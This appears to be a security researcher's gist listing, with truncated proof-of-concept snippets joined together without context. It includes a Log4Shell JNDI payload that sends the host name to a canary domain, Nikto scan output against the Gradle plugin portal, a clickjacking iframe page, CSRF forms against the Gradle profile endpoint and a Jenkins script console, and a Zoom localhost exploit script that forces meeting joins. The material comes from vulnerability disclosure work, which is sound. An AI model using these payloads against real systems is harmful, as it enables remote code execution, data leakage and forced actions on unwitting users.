- ${jndi:ldap://x${hostName}.L4J.lile3fakwhyqg99zgj0yytxz7.canarytokens.com/a}
- @JLLeitschuh
- @JLLeitschuh@infosec.exchange
package org.jlleitschuh.testing.security; | |
import org.gradle.api.Plugin; | |
import org.gradle.api.Project; | |
public class SecurityPlugin implements Plugin<Project> { | |
/**
 * Applies this plugin to the given project.
 *
 * <p>The only action taken is one lifecycle-level log line, which serves as a harmless
 * marker that the plugin's code was executed by the build.
 *
 * <p>NOTE(review): Gradle calls this method inside the build process when the plugin is
 * applied, so anything a resolved plugin does here runs with the build's own privileges.
 * That is why the origin and integrity of plugin artifacts need to be verified.
 *
 * @param target the project the plugin is being applied to
 */
@Override
public void apply(final Project target) {
    // Marker text only; no other side effect is performed.
    final String marker = "A security plugin. I'm malicious!";
    target.getLogger().lifecycle(marker);
}
buildscript { | |
repositories { | |
gradlePluginPortal() | |
} | |
dependencies { | |
/* | |
* In practice, this attack could have been leveraged against any plugin on | |
* the Gradle plugin portal. | |
* I created my own plugin for testing purposes. | |
*/ |
nikto -h https://plugins.gradle.org/ | |
- Nikto v2.1.6 | |
--------------------------------------------------------------------------- | |
+ Target IP: 104.16.174.166 | |
+ Target Hostname: plugins.gradle.org | |
+ Target Port: 443 | |
--------------------------------------------------------------------------- | |
+ SSL Info: Subject: /OU=Domain Control Validated/OU=PositiveSSL Multi-Domain/CN=ssl473435.cloudflaressl.com | |
Altnames: ssl473435.cloudflaressl.com, *.gradle.org, gradle.org | |
Ciphers: ECDHE-ECDSA-CHACHA20-POLY1305 |
<html> | |
<head> | |
<style> | |
iframe { /* iframe from the victim site */ | |
width: 400px; | |
height: 100px; | |
position: absolute; | |
top: 0; | |
left: -20px; | |
opacity: 0.5; /* in real opacity:0 */ |
<?xml version="1.0" encoding="UTF-8"?> | |
<html> | |
<head></head> | |
<body> | |
<form action="https://plugins.gradle.org/user" method="POST" class="edit-profile-form" _lpchecked="1"> | |
<dl id="name_field"> | |
<dt> | |
<label for="name"></label> | |
</dt> | |
<dd> |
<!--
  Cross-site request forgery demonstration page.
  The form below is served from a different origin than Jenkins and POSTs a
  "script" field to the Jenkins script console endpoint (/script). The sample
  script only prints a message and the instance's agent list.
  The request has an effect only if the visitor's browser holds an authenticated
  Jenkins session and the server accepts the POST without a valid CSRF crumb.
  The relevant defenses are keeping Jenkins CSRF protection enabled and
  restricting who may reach the script console.
-->
<html>
  <body>
    <form action="http://corperate-jenkins.lab.com:8080/script" method="POST">
      <!-- Hidden field: its value is what the script console would evaluate. -->
      <input
        type="hidden"
        name="script"
        value="println 'Hello! I just ran an arbitrary bit of code on Jenkins!'; println Jenkins.instance.slaves"/>
      <!-- Submission still requires a click; the page contains no script. -->
      <input
        type="submit"
        value="Submit!"/>
    </form>
  </body>
</html>
/* ****************************************************************************** */ | |
// MIT License | |
// | |
// Copyright (c) 2019 Hewlett Packard Enterprise Development LP | |
// | |
// Permission is hereby granted, free of charge, to any person obtaining a copy | |
// of this software and associated documentation files (the "Software"), to deal | |
// in the Software without restriction, including without limitation the rights | |
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell | |
// copies of the Software, and to permit persons to whom the Software is |
http://localhost:19421/launch?action=join&confno=[some confrence number] |
<iframe src="https://zoom.us/j/492468757"/> |
<body> | |
<script> | |
// It's actually better if this number isn't a valid zoom number. | |
var attackNumber = "694138052" | |
setInterval(function(){ | |
var image = document.createElement("img"); | |
// Use a date to bust the browser's cache | |
var date = new Date(); | |
image.src = "http://localhost:19421/launch?action=join&confno=" + attackNumber + "&" + date.getTime(); |